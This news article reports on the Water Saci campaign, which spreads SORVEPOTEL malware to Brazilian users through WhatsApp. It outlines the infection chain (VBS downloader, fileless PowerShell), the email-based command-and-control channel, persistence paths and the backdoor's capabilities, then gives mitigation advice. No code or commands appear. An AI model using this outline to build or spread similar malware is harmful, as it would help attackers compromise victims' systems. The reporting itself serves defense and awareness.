Water Saci Hackers Exploit WhatsApp to Deploy Persistent SORVEPOTEL Malware
Article Text:
In a recent cybersecurity development, a sophisticated malware campaign known as Water Saci has been identified, targeting Brazilian users through the popular messaging platform WhatsApp. This campaign utilizes the SORVEPOTEL malware, demonstrating advanced techniques in propagation, persistence, and command-and-control operations.
Emergence and Evolution of the Water Saci Campaign
First detected in September 2025, the Water Saci campaign has rapidly evolved, showcasing a shift from traditional .NET-based attack methods to more complex script-based techniques. By October 2025, cybersecurity analysts observed a significant transformation in the malware’s delivery mechanism, indicating a strategic adaptation to evade detection and enhance infection rates.
Exploitation of WhatsApp for Malware Distribution
A notable aspect of the Water Saci campaign is its exploitation of WhatsApp as the primary vector for malware distribution. Compromised accounts are used to automatically send malicious ZIP files to all contacts and groups associated with the infected user. This method not only facilitates rapid propagation but also leverages the trust inherent in personal communications, increasing the likelihood of recipients opening the malicious files.
Technical Breakdown of the Attack Chain
The infection process initiates when a user downloads and extracts a malicious ZIP archive received via WhatsApp. This archive contains an obfuscated Visual Basic Script (VBS) downloader named Orcamento.vbs. Upon execution, this script runs a PowerShell command designed to perform fileless execution, a technique that loads and executes code directly in memory, thereby evading traditional file-based detection methods.
The PowerShell script, referred to as tadeu.ps1, is retrieved from a remote server and executed in memory. This script is responsible for downloading and executing additional payloads, further embedding the malware into the system. The use of fileless execution and script-based payloads represents a significant advancement in malware tactics, complicating detection and remediation efforts.
Command-and-Control Infrastructure and Persistence Mechanisms
SORVEPOTEL employs a dual-channel communication architecture that sets it apart from conventional malware. Instead of relying solely on HTTP-based command-and-control (C&C) servers, it utilizes IMAP connections to access email accounts hosted on terra.com.br using hardcoded credentials. This email-based C&C infrastructure provides resilience against disruptions, as it allows attackers to issue commands and receive data through standard email protocols.
To maintain persistence on infected systems, the malware modifies registry entries and creates scheduled tasks. Specifically, it installs a VBS script named WinManagers.vbs in the C:\ProgramData\WindowsManager\ directory. This script ensures that the malware remains active, even after system reboots or attempts to remove it.
The backdoor component of SORVEPOTEL is programmed to check the designated email inbox every thirty minutes, extracting various types of URLs, including primary data endpoints, backup infrastructure links, and additional PowerShell payload delivery addresses. This systematic approach ensures continuous communication with the attackers and the ability to receive updated instructions or payloads as needed.
Operational Capabilities and Potential Impact
The SORVEPOTEL backdoor is equipped with over twenty distinct commands, granting attackers comprehensive control over compromised systems. These commands include:
– System Information Gathering: Collecting detailed data about the infected machine, such as operating system version, hardware specifications, and network configurations.
– Process Management: Listing, starting, stopping, or modifying running processes, allowing attackers to manipulate system operations.
– Screenshot Capture: Taking snapshots of the user’s screen to monitor activities or capture sensitive information.
– File Operations: Reading, writing, deleting, or transferring files, enabling data theft or the introduction of additional malicious components.
– System Power Control: Shutting down, restarting, or putting the system into sleep mode, which can be used to disrupt operations or evade detection.
These capabilities position SORVEPOTEL as a full-featured backdoor with sophisticated operational flexibility. The potential impact includes unauthorized access to sensitive information, disruption of business operations, and the establishment of a botnet comprising infected machines under the attackers’ control.
Mitigation Strategies and Recommendations
Given the advanced nature of the Water Saci campaign and the SORVEPOTEL malware, it is imperative for individuals and organizations to adopt robust cybersecurity measures:
1. Exercise Caution with Unsolicited Messages: Be wary of unexpected messages, even from known contacts, especially those containing attachments or links. Verify the authenticity of such communications through alternative channels before opening any files.
2. Implement Advanced Endpoint Protection: Utilize security solutions capable of detecting and mitigating fileless malware and script-based attacks. Regularly update these tools to ensure they can identify the latest threats.
3. Regular Software Updates: Keep operating systems, applications, and security software up to date to patch vulnerabilities that could be exploited by malware.
4. User Education and Awareness: Conduct training sessions to educate users about the risks associated with phishing and social engineering tactics. Encourage a culture of skepticism and verification when dealing with digital communications.
5. Monitor Network Traffic: Implement network monitoring to detect unusual patterns or communications that may indicate malware activity. Pay particular attention to outbound connections to unfamiliar domains or IP addresses.
6. Email Security Measures: Given the malware’s use of email-based C&C channels, ensure that email security protocols are robust. This includes monitoring for unauthorized access, implementing multi-factor authentication, and regularly reviewing email account activity.
Conclusion
The Water Saci campaign underscores the evolving landscape of cyber threats, where attackers continuously refine their methods to bypass security measures and exploit widely used platforms like WhatsApp. The deployment of SORVEPOTEL malware through such channels highlights the need for heightened vigilance and proactive security practices. By understanding the tactics employed in this campaign and implementing comprehensive defense strategies, users and organizations can better protect themselves against similar sophisticated threats.
